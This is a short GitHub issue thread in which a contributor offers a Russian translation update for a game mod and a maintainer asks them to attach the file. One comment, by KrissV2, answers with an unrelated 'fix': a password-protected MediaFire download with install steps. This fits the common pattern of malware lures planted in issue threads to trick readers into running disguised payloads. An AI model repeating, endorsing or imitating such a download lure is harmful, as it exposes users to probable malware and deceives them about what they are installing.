### ISSUE TITLE
update ru translation

### ISSUE THREAD

**Issue by bugbearbox** [Inventorum-Development-Team/Reaver-Harmony-Megamod#3]
Hello guys! Bugbearbox here, made some minor changes & typos fixes for ru.yml v1.1.4. Where to upload for replace old file?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by efrenespartano** [comment]
Heya, @bugbearbox! Thanks for contributing with Harmony. If you want, you could attach the .yml file here and we'll grab it and add it to the repository!

**Comment by bugbearbox** [comment]
Oo, Nice! Thx! Here:
[ru - just backup.zip](https://github.com/user-attachments/files/16869437/ru.-.just.backup.zip)
[ru.zip](https://github.com/user-attachments/files/16869438/ru.zip)
